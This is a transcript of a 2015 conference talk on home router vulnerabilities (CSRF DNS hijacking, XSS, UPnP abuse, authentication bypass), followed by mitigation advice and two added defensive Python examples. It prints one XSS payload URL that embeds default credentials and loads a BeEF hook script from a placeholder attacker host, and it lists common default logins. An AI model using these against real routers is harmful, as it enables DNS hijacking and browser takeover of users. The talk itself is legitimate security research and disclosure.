Soho routers: swords and shields CyberCamp 2015

Post on 12-Apr-2017


Transcript of Soho routers: swords and shields CyberCamp 2015

SOHO Routers: Swords & Shields

Álvaro Folgado, José Antonio Rodríguez, Iván Sanz


About us… Meet our research group

Álvaro Folgado Rueda, Independent Researcher

José Antonio Rodríguez García, Independent Researcher

Iván Sanz de Castro, Security Analyst at Wise Security Global

The talk

Mitigations

Vulnerabilities & Attacks

Keys

Real World Attacks

Example 1 – Dictionary for DNS Hijacking via CSRF

Example 2 – Phishing website

Example 3 – Linux/Moose Malware

Common security problems: Services

Too many. Mostly useless.
□ Increases attack surface

Insecure

Common security problems: Default credentials

Public and well-known for each model
Not randomly generated
Hardly ever modified by users

[Pie chart: share of the tested models using each default user/password pair (1234/1234, admin/admin, [blank]/admin, admin/password, vodafone/vodafone); the slices shown are 45%, 27%, 18%, 5% and 5%]

Common security problems: Multiple user accounts

Also with public default credentials
Mostly useless for users
Almost always hidden from end-users
□ Passwords for these accounts are never changed

Swords


Bypass Authentication

Allows unauthenticated attackers to carry out router configuration changes, locally and remotely

Exploits:
□ Improper file permissions: web configuration interface
□ Service misconfiguration: SMB and Twonky Media Server

Persistent DoS / restore router to default settings without requiring authentication
□ Exploiting the Twonky Media Server

Video Demos #1 & #2

Cross Site Request Forgery

Change any router configuration settings by sending a specific malicious link to the victim

Main goal: DNS Hijacking

Requires embedding login credentials in the malicious URL
Attack feasible if credentials have never been changed
Google Chrome does not pop up a warning

Cross Site Request Forgery: Suspicious link, isn't it?

URL Shortening Services
Create a malicious website

Persistent Cross Site Scripting

Inject malicious script code within the web configuration interface

Goals:
Session Hijacking
Browser Infection

Persistent Cross Site Scripting

Browser Exploitation Framework (BeEF) is a great help

Input field character length limitation: BeEF hooks link to a more complex script file hosted by the attacker

http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>

Unauthenticated Cross Site Scripting

Script code injection is performed locally without requiring any login process

Send a DHCP Request PDU containing the malicious script within the hostname parameter

The malicious script is injected within the Connected Clients (DHCP Leases) table

Unauthenticated Cross Site Scripting


Unauthenticated Cross Site Scripting: Always try harder

Privilege Escalation

A user without administrator rights is able to escalate privileges and become an administrator

Shows why multiple user accounts are unsafe

Privilege Escalation via FTP

Video Demo #3

Backdoor

Hidden administrator accounts
Completely invisible to end users
But allows attackers to change any configuration setting

Information Disclosure

Obtain critical information without requiring any login process:
WLAN password
Detailed list of currently connected clients
Hints about the router's administrative password
Other critical configuration settings

Information Disclosure


Universal Plug and Play

Enabled by default on several router models
Allows applications to execute network configuration changes such as opening ports

Extremely insecure protocol:
Lack of an authentication process
Awful implementations

Main goals:
Open critical ports for remote WAN hosts
Persistent Denial of Service
Carry out other configuration changes

Universal Plug and Play: Locally

Miranda UPnP tool

Universal Plug and Play: Remotely

Malicious SWF file

Attack vectors

Locally: the attacker is connected to the victim's LAN, either using an Ethernet cable or wirelessly

Remotely: the attacker is outside of the victim's LAN

Social Engineering is your friend

For link-based remote attacks: XSS, CSRF and UPnP
Social Networks = Build the easiest botnet ever!
Phishing emails = Targeted attacks

Live Demo #1: DNS Hijacking via CSRF

Live Demo #2: Unauthenticated Cross Site Scripting via DHCP Request

Live Demo #3: Reflected XSS + client-side attack to get Reverse Shell

Live Demo #4: Bypass Authentication using SMB Symlinks

Live Demo #3: Details

Using a Reflected Cross Site Scripting to get a Reverse Shell on the victim's computer

Exploits an Internet Explorer client-side vulnerability: CVE-2012-1876

Shields


Mitigations: End users

Users start with a broken shield:
Limited configuration settings
Several attacks cannot be stopped
Mitigations only work for specific models
Not as easy as buying a brand new router
No antivirus is going to protect you

Mitigations: End users: Where to start?

Identify your router model
Look for router credentials
Get into the advanced configuration interface

Mitigations: End users: General recommendations

Only log into the web interface when needed
□ Logout (if possible) / wipe the browser's cache after finishing

Change your router's administrative password

Mitigations: End users: General recommendations

Check your DNS servers on a weekly basis

Mitigations: End users: General recommendations

Do not trust shortened links
Be careful when browsing the web interface

Mitigations: End users: Multiple user accounts

Try to delete any other administrative account
At least change their passwords, if possible

Video Demo #4: Mitigating Privilege Escalation and account-related attacks

Mitigations: End users: Services

Disable any unused service if given the chance
□ FTP and SMB
□ Media Servers: Twonky
□ UPnP
□ If local risk, DHCP

It does not always work…

Mitigations: End users: Firmware

Update to the latest version
□ Manufacturer might not have fixed any issues

How?

Mitigations: End users: Custom Firmware Images

For advanced users
More configuration settings
Might have security flaws as well

Mitigations: Manufacturers

Listen to what security researchers have to say

Do not include useless services
□ Especially for ISP SOHO routers
□ At least, make it feasible to completely shut them down

Critical ports closed to WAN by default
□ At least 21, 22, 23, 80 and 8000/8080

Mitigations: Manufacturers

Do not include multiple user accounts
Design a safer alternative to UPnP
Avoid using unsafe protocols (HTTP, Telnet, FTP); use HTTPS, SSH, SFTP
Randomly generate user credentials

[Diagram: the admin password shown alongside the device's serial number, MAC address and manufacturing date]

Mitigations: Manufacturers: XSS

Check every input field within the router's web interface
Sanitize DHCP hostname parameters
Content Security Policies
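To make the "sanitize DHCP hostname parameters" recommendation concrete (and to show how the DHCP-based unauthenticated XSS from the Swords section is stopped), here is an added Python example that is not the talk's own code: it validates the host name option of a DHCP Request against RFC 1123 syntax before storing it, and HTML-escapes every cell when rendering the Connected Clients table. The lease rows, the placeholder value and the function names are constructed for this example.

```python
import html
import re

# RFC 1123 host-name label: letters, digits and hyphens, 1-63 chars, no leading/trailing hyphen.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def is_valid_hostname(name: str) -> bool:
    """Accept only a syntactically valid RFC 1123 host name (at most 253 characters)."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in name.rstrip(".").split("."))


def sanitize_dhcp_hostname(raw: bytes) -> str:
    """Turn the host name option (option 12) of a DHCP Request into a value that is safe
    to store: anything that is not a valid host name is replaced by a fixed placeholder,
    so the leases table never keeps attacker-controlled markup (first layer of defence)."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return "invalid-hostname"
    return text if is_valid_hostname(text) else "invalid-hostname"


def render_leases_row(ip: str, mac: str, hostname: str) -> str:
    """Render one row of the Connected Clients table, HTML-escaping every cell.
    Escaping at output time is the second layer: even a stored value cannot become markup."""
    cells = (html.escape(ip, quote=True), html.escape(mac, quote=True),
             html.escape(hostname, quote=True))
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


# Constructed sample leases: a benign client and one whose host name option carries a script tag.
SAMPLE_LEASES = [
    ("192.168.1.10", "aa:bb:cc:dd:ee:01", b"laptop-01"),
    ("192.168.1.11", "aa:bb:cc:dd:ee:02", b"<script src=//example.invalid/x.js></script>"),
]


def render_leases_table(leases=SAMPLE_LEASES) -> str:
    """Build the Connected Clients table from (ip, mac, raw_hostname) tuples."""
    rows = [render_leases_row(ip, mac, sanitize_dhcp_hostname(raw)) for ip, mac, raw in leases]
    return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    print(render_leases_table())
```

Underscores, which some clients put in their host names, are rejected by this label pattern; widen `_LABEL` deliberately if a deployment needs them, keeping the output escaping in place regardless.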

Mitigations: Manufacturers: CSRF

Tokens… that work
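An added example (not the talk's own code) of a CSRF token scheme for a configuration endpoint such as the DNS settings change targeted in Live Demo #1: the token is bound to the server-side session with an HMAC, compared in constant time, and the handler also requires POST and a trusted Origin/Referer, so a GET link that merely carries embedded HTTP credentials is refused. The router origin, the server key and the handler name are assumptions made for this example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"   # assumed origin of the router's web interface


class Session:
    """Minimal server-side session: a random id plus a CSRF token derived from it."""

    def __init__(self, server_key: bytes):
        self.session_id = secrets.token_hex(16)
        # Binding the token to the session id (HMAC with a server-side key) means a token
        # captured from one session cannot be replayed against another.
        self.csrf_token = hmac.new(server_key, self.session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_is_valid(session: Session, presented: Optional[str]) -> bool:
    """Constant-time comparison so the check does not leak the token byte by byte."""
    if not presented:
        return False
    try:
        return hmac.compare_digest(session.csrf_token, presented)
    except TypeError:          # non-ASCII input cannot be a valid hex token
        return False


def origin_is_trusted(headers: Dict[str, str]) -> bool:
    """Only the router's own pages may issue state-changing requests. A link opened from a
    third-party site or e-mail carries that site's Origin (or no usable Referer) and is refused."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == ROUTER_ORIGIN


def handle_set_dns(session: Session, method: str, headers: Dict[str, str],
                   form: Dict[str, str]) -> Tuple[int, str]:
    """Hypothetical handler for the 'change DNS servers' form. Valid HTTP credentials on the
    request (e.g. embedded in the URL as user:pass@host) are not sufficient on their own."""
    if method != "POST":
        return 405, "configuration changes must be POSTed"
    if not origin_is_trusted(headers):
        return 403, "untrusted origin"
    if not csrf_token_is_valid(session, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, f"dns1 set to {form['dns1']}"
```

A token only works when it is unpredictable and per session; a fixed value baked into the firmware is known to anyone who owns the same model and protects nothing.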

Mitigations: Manufacturers: Bypass Authentication & Information Disclosure

Check for improper file permissions and public debug messages

Service-related: check for possible wrong service configuration (e.g. FTP, SMB)

Keys

Developed tools

Manufacturers' response

Average 2-3 emails sent to each manufacturer
Most of them unreplied... 7 months later
Number of vulnerabilities fixed: 0

Responsible Disclosure


Results

More than 60 vulnerabilities have been discovered
22 router models affected
11 manufacturers affected

[Bar chart: disclosed vulnerabilities per manufacturer, plotting the number of disclosed vulnerabilities and the number of affected routers for Amper, Astoria, Belkin, Comtrend, D-Link, Huawei, Linksys, Netgear, Observa T., Sagemcom and Zyxel]

[Pie chart: vulnerabilities by type: XSS, Unauthenticated XSS, CSRF, Denial of Service, Privilege Escalation, Information Disclosure, Backdoor, Bypass Authentication and UPnP; the slices shown are 23%, 21%, 20%, 15%, 8%, 6%, 3%, 2% and 2%]

Conclusion

Has SOHO router security improved? Hell NO!

Serious security problems
Easy to exploit
With huge impact
Millions of users affected

PLEASE, START FIXING SOHO ROUTER SECURITY

Álvaro Folgado Rueda · alvfolrue@gmail.com
José A. Rodríguez García · joseantorodriguezg@gmail.com
Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com

Thank you! Q&A Time

https://cybercamp.es @CyberCampEs #CyberCamp15